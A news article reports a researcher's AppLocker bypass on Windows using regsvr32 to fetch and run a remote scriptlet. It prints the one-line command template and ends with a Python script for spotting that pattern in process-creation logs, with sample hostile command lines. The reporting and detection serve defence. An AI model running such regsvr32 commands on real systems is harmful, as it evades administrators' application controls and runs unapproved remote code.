Researcher finds way to bypass AppLocker restrictions in Windows


The American security researcher Casey Smith has shown in a blog post that the Windows feature AppLocker can be bypassed with little effort. This makes it possible, for example, to run programs that AppLocker does not allow.

AppLocker allows administrators to control the use of programs per user and thus, among other things, restrict the execution of certain applications. The feature is present in Windows 7 and above. Smith found that the protection can be bypassed with the program regsvr32, which is normally used, for example, to register DLL files in the Windows registry. Smith discovered the method when he wanted to run an application on a workstation on which certain actions were restricted with AppLocker.

The bypass works because regsvr32 accepts a script supplied in the form of a URL. According to Smith, this is known to few and has a number of advantages: “The great thing is that regsvr32 uses a proxy if one is present, uses TLS and follows redirects. It is also a signed standard Windows binary.” To run a script, it only has to be present in a location that the user controls, Smith adds. He has created a proof of concept to illustrate the technique.

The researcher indicates that the necessary code is very short and would fit in a tweet if necessary. The command takes the form regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll, where the .sct file contains the script to run. Other extensions also work, for example an XML file containing JavaScript, as The Register shows. A further aspect is that the technique registers no COM object in the registry, which is part of what makes it hard to detect. In addition, no administrator rights are needed to run the command. Microsoft has not yet released a patch.
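Because the technique leaves no COM object in the registry, the most useful defensive signal is the regsvr32 command line itself as recorded by process-creation auditing. The script below is an added example (not from the article or from Smith's proof of concept) that checks command lines for the /i:&lt;url&gt; plus scrobj.dll shape described above; the sample command lines, hostnames and function names are constructed for illustration.

```python
import re

# Constructed sample process-creation command lines (not from the article).
SAMPLE_COMMAND_LINES = [
    r'regsvr32.exe /s /n /u /i:http://example.invalid/file.sct scrobj.dll',
    r'regsvr32 /s /n /u /i:https://example.invalid/payload.xml scrobj.dll',
    r'REGSVR32.EXE /S /I:HTTPS://EXAMPLE.INVALID/A.SCT scrobj.dll',
    r'regsvr32.exe /s C:\Windows\System32\vbscript.dll',
    r'regsvr32.exe /s /i:"C:\Program Files\App\setup.sct" scrobj.dll',
    r'notepad.exe C:\Users\alice\notes.txt',
]

# Split on whitespace while keeping double-quoted segments inside one token.
TOKEN_RE = re.compile(r'(?:[^\s"]|"[^"]*")+')
# /i:<url>, optionally quoted; any extension counts, since .sct is not required.
URL_ARG_RE = re.compile(r'^/i:"?(https?://[^"\s]+)"?$', re.IGNORECASE)

def _basename(token):
    """Lower-cased file name of a path token, quotes stripped."""
    return token.strip('"').rsplit('\\', 1)[-1].lower()

def analyze_command_line(cmdline):
    """Return a finding dict if cmdline matches the regsvr32 scriptlet pattern, else None."""
    tokens = TOKEN_RE.findall(cmdline)
    if not tokens or _basename(tokens[0]) not in ('regsvr32', 'regsvr32.exe'):
        return None
    remote_url = None
    for tok in tokens[1:]:
        m = URL_ARG_RE.match(tok)
        if m:
            remote_url = m.group(1)
    loads_scrobj = any(_basename(t) == 'scrobj.dll' for t in tokens[1:])
    if remote_url is None and not loads_scrobj:
        return None  # ordinary DLL registration, not of interest here
    # Remote URL plus scrobj.dll is exactly the shape described in the article;
    # a local script handed to scrobj.dll is still worth a look, so rate it medium.
    severity = 'high' if remote_url and loads_scrobj else 'medium'
    return {'severity': severity, 'url': remote_url, 'scrobj': loads_scrobj, 'cmdline': cmdline}

def scan(command_lines):
    """Run the check over a batch of command lines and return the findings."""
    return [f for f in map(analyze_command_line, command_lines) if f]

if __name__ == '__main__':
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(finding['severity'], finding['url'] or '(local script)', '|', finding['cmdline'])
```

Feed it the CommandLine field from Windows process-creation events (Security event 4688 with command-line auditing enabled, or Sysmon event 1); plain DLL registrations pass through untouched.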
